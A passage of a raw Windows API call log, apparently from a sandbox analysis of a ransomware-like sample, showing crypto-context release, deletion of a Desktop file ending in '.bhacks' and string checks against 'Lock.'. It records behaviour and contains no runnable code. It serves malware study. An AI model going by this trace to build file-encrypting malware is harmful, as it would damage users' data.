wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0101.967] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0101.967] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0101.967] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0101.967] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0101.967] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0101.967] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0101.967] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0101.967] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.967] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0101.967] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.967] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0101.967] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0101.967] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0101.967] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0101.967] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.967] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0101.968] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.968] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0101.968] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.968] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0101.968] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.968] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.968] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0101.968] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.968] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0101.968] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.968] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.968] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0101.968] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.968] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0101.968] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0101.968] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0101.968] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0101.968] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0101.968] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.968] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.968] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.968] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.968] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.968] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.969] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0101.969] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.969] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0101.969] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.969] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.969] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0101.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0101.969] CryptReleaseContext (hProv=0x9bed58, dwFlags=0x0) returned 1 [0101.969] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.969] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0101.969] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.969] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0101.969] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.969] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0101.969] FreeLibrary (hLibModule=0x76390000) returned 1 [0101.969] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.969] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0101.969] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.969] CloseHandle (hObject=0x44c) returned 1 [0101.970] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0101.970] CloseHandle (hObject=0x458) returned 1 [0102.019] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.020] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.020] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0102.020] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0102.020] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/J_gUxI4K04bkqo7tW4.avi.bhacks", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\J_gUxI4K04bkqo7tW4.avi.bhacks", lpFilePart=0x8cedf4*="J_gUxI4K04bkqo7tW4.avi.bhacks") returned 0x35 [0102.020] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\J_gUxI4K04bkqo7tW4.avi.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\j_guxi4k04bkqo7tw4.avi.bhacks")) returned 0x20 [0102.020] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\J_gUxI4K04bkqo7tW4.avi.bhacks", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24cfc8f3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x24cfc8f3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24e51519, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xfb70, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="J_gUxI4K04bkqo7tW4.avi.bhacks", cAlternateFileName="J_GUXI~1.BHA")) returned 0x9a3b80 [0102.021] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\J_gUxI4K04bkqo7tW4.avi.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\j_guxi4k04bkqo7tw4.avi.bhacks")) returned 1 [0102.065] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24cfc8f3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x24cfc8f3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24e51519, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xfb70, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="J_gUxI4K04bkqo7tW4.avi.bhacks", cAlternateFileName="J_GUXI~1.BHA")) returned 0 [0102.066] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0102.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75150 | out: hHeap=0x2af0000) returned 1 [0102.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0102.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0102.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0102.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0102.066] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0102.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0102.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0102.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0102.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0102.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0102.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0102.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0102.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0102.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0102.066] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0102.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0102.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0102.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0102.066] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.066] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0102.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0102.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0102.067] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0102.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0102.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6760 [0102.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0102.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0102.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0102.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0102.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0102.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0102.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0102.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0102.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0102.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0102.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0102.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0102.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0102.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0102.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a751c8 [0102.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6760 | out: hHeap=0x2af0000) returned 1 [0102.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0102.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0102.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0102.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0102.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0102.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0102.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0102.067] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0102.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0102.067] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0102.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0102.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0102.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0102.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0102.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0102.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0102.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0102.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0102.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0102.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6c) returned 0x2a75150 [0102.068] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/J_gUxI4K04bkqo7tW4.avi.bhacks", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\J_gUxI4K04bkqo7tW4.avi.bhacks", lpFilePart=0x8cf650*="J_gUxI4K04bkqo7tW4.avi.bhacks") returned 0x35 [0102.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75150 | out: hHeap=0x2af0000) returned 1 [0102.068] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\J_gUxI4K04bkqo7tW4.avi.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\j_guxi4k04bkqo7tw4.avi.bhacks")) returned 0xffffffff [0102.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a751c8 | out: hHeap=0x2af0000) returned 1 [0102.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0102.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0102.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0102.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0102.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0102.068] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.068] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0102.068] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.068] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0102.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0102.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0102.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0102.068] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0102.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0102.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0102.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0102.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0102.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0102.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0102.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0102.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0102.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kz5g.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z5g.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5g.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0102.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.069] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0102.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0102.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0102.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0102.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0102.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0102.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0102.069] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0102.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0102.069] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0102.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0102.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.069] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0102.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0102.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 